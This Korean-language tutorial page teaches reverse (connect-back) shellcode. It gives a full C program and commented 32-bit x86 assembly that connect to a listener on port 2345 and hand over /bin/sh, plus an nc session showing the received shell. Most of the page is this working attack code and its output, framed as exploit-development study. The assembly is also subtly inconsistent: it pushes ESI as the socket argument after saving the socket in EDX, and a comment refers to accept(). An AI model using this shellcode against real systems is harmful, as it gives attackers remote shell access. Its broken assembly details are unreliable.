Excuse the ads! We need some help to keep our site up.

List

Reverse Shellcode

포트 바인딩 쉘 코드는 방화벽으로 쉽게 막을 수 있습니다.
- 대부분의 방화벽은 알려진 특정 포트를 제외하고는 들어오는 연결을 막습니다.
- 이렇게 해야 사용자의 외부 노출을 막을 수 있고, 포트 바인딩 쉘코드의 공격도 막을 수 있습니다.
- 소프트웨어 방화벽이 보편화돼 포트 바인딩 쉘 코드가 실제로 통할 가능성은 극히 낮아 졌습니다.
하지만 방화벽은 편의성을 방해하지 않으려고 일반적으로 나가는 연결은 거르지 않습니다.
- 방화벽 안쪽에서는 어떤 웹 페이지에든 접근할 수 있고, 나가는 연결을 만들 수 있습니다.
- 즉, 쉘코드가 나가는 연결을 만들 수 있다면 방화벽을 무시하고 공격할 수 있습니다.
커넥트 백(connect-back) 쉘 코드는 공격자로부터의 연결을 기다리는 대신 공격자의 IP 주소로 돌아오는 TCP 연결을 만듭니다.
- TCP 연결을 만들 때는 socket()과 connect() 함수의 호출이 필요합니다.
- 포트 바인팅 쉘코드와 비교해 socket호출은 동일하고, connect() 호출의 인자는 bind()의 인자와 같으므로 포트 바인딩 쉘코드와 비슷합니다.

C language

Port bind shellcode와 많이 다르지 않습니다.
- bind, listen, accept 함수 대신 connect 함수를 이용하여 서버에 접속합니다.

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void)
{
        int i, server_sockfd;
        socklen_t socklen;
        struct sockaddr_in server_addr;

        char *argv[] = { "/bin/sh", NULL};
        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(2345);
        server_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
        server_sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
        connect(server_sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr));

        for(i = 0; i <= 2; i++)
                dup2(server_sockfd, i);

        execve( "/bin/sh", argv, NULL );
}

Test program

다음과 같이 nc 프로그램을 이용해 port를 오픈합니다.

lazenca0x0@ubuntu:~$ nc -l -p 2345 -v
Listening on [0.0.0.0] (family 0, port 2345)

앞에서 작성한 코드를 빌드 후 실행합니다.

lazenca0x0@ubuntu:~/back$ gcc -o test test.c 
lazenca0x0@ubuntu:~/back$ ./test

해당 프로그램을 실행하면 nc로 오픈한 Port에 접속하게되며, nc를 이용해 "/bin/sh" 프로그램을 이용할 수 있습니다.

lazenca0x0@ubuntu:~$ nc -l -p 2345 -v
Listening on [0.0.0.0] (family 0, port 2345)
Connection from [127.0.0.1] port 2345 [tcp/*] accepted (family 2, sport 55482)
id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
exit
lazenca0x0@ubuntu:~$

Connect()

connect() 함수는 생성한 소켓을 통해 서버로 접속을 요청합니다.

int connect(int sockfd, const struct sockaddr *serv_addr, socklen_t addrlen);

해당 함수의 시스템 콜 번호는 3번입니다.

lazenca0x0@ubuntu:~$ cat /usr/include/linux/net.h |grep connect
#define SYS_CONNECT	3		/* sys_connect(2)		*/
	SS_UNCONNECTED,			/* unconnected to any socket	*/
	SS_CONNECTING,			/* in process of connecting	*/
	SS_CONNECTED,			/* connected to socket		*/
	SS_DISCONNECTING		/* in process of disconnecting	*/
lazenca0x0@ubuntu:~$

Assembly code

BITS 32
  
;socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
push BYTE 102			; socketcall의 시스템 콜 번호 102를 Stack에 저장합니다.
pop eax					; Stack에 저장된 시스템 콜 번호를 EAX 레지스터에 저장합니다.
cdq						; EDX 레지스터에 DWORD 크기의 Null byte를 저장합니다.
push dword 1			; socket 함수의 호출 번호 1을 Stack에 저장합니다.
pop ebx					; socketcall() 함수의 1번째 인자(EBX 레지스터)값으로 SYS_SOCKET(1)을 저장 합니다.
;두번째 인자에 전달할 인자 배열을 생성
push edx				; socket() 함수의 3번째 인자 값 0을 Stack에 저장합니다.
push ebx				; socket() 함수의 2번째 인자 값 SOCK_STREAM(1)을 Stack에 저장합니다.
push BYTE 2         	; socket() 함수의 1번째 인자 값 PF_INET(2)을 Stack에 저장합니다.
mov ecx, esp        	; socketcall() 함수의 2번째 인자(ECX 레지스터)값으로 인자 배열의 시작 주소값(ESP 레지스터)을 저장 합니다.
int 0x80
  
;server_sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
xchg edx,eax			; 소켓 함수로 부터 리턴받은 값을 EDX 레지스터에 저장합니다.
						; EAX 레지스터는 0으로 초기화 합니다.
  
;connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr))
mov al, 0x66			; socketcall의 시스템 콜 번호 102를 Stack에 저장합니다.
;struct sockaddr_in server_addr;
push DWORD 0x0101017f	; server_addr.sin_addr.s_addr = inet_addr("127.1.1.1"); Little-endian
push WORD 0x2909		; server_addr.sin_port = htons(2345); Little-endian
inc ebx					; 
push WORD bx			; server_addr.sin_family = AF_INET;
mov ecx, esp			; ECX레지스터에 server_addr 구조체의 시작 주소를 저장합니다.
push BYTE 16			; connect() 함수의 3번째 인자 값 16을 Stack에 저장합니다.
push ecx				; connect() 함수의 2번째 인자 값 &server_addr을 Stack에 저장합니다.
push esi				; connect() 함수의 1번째 인자 값 server_sockfd를 Stack에 저장합니다.
mov ecx, esp			; socketcall() 함수의 2번째 인자 값을 ECX 레지스터에 저장 합니다.
inc ebx             	; socketcall() 함수의 1번째 인자 값으로 SYS_CONNECT(3)를 저장하게 됩니다.
int 0x80

;for(i = 0; i <= 2; i++)
;	dup2(server_sockfd, i);
xchg eax,ebx        ; accept() 함수로 부터 리턴받은 파일 디스크립터를 EBX레지스터에 저장하고, EAX레지스터 초기화를 위해 파일 디스크립터(0x00000005)를 EAX 레지스터에 저장합니다.
push BYTE 0x2       ; Stack에 2 저장합니다.
pop ecx             ; ECX 레지스터에 2으로 저장 합니다.(dup2 함수의 2번째 인자값)
dup2_call:
    mov BYTE al, 0x3F   ; dup2 함수의 시스템 콜 번호(63)를 AL 레지스터에 저장합니다.
    int 0x80            ;
    dec ecx             ; dup2 함수의 2번째 인자값을 감소(-1) 시킵니다.
    jns dup2_call       ; 부호 플래그가 거짓(0)이면 dup2_call로 점프 합니다.
  
;execve( "/bin/sh", argv, NULL );
mov BYTE al, 11     ; execve() 시스템 함수의 콜 번호 11을 EAX레지스터에 저장합니다.
push edx            ; 문자열의 끝을 알리기 위해 Null을 먼저 Stack에 저장합니다.
push 0x68732f2f     ; 문자 "//sh"를 Stack에 저장합니다. Little-endian
push 0x6e69622f     ; 문자 "/bin"를 Stack에 저장합니다. Little-endian
mov ebx, esp        ; execve() 함수의 1번째 인자값으로 ESP 레지스터의 값을 저장합니다.
push edx            ; Stack에 Null을 저장합니다.
mov edx, esp        ; execve() 함수의 3번째 인자값으로 Null이 저장된 배열의 주소(ESP)를 저장합니다.
push ebx            ; Stack에 "/bin//sh" 문자의 시작주소(EBX)를 저장합니다.
mov ecx, esp        ; execve() 함수의 2번째 인자값으로 배열의 주소(ESP,["/bin//sh"],[Null])를 저장합니다.
int 0x80            ;

Related site

http://man7.org/linux/man-pages/man2/connect.2.html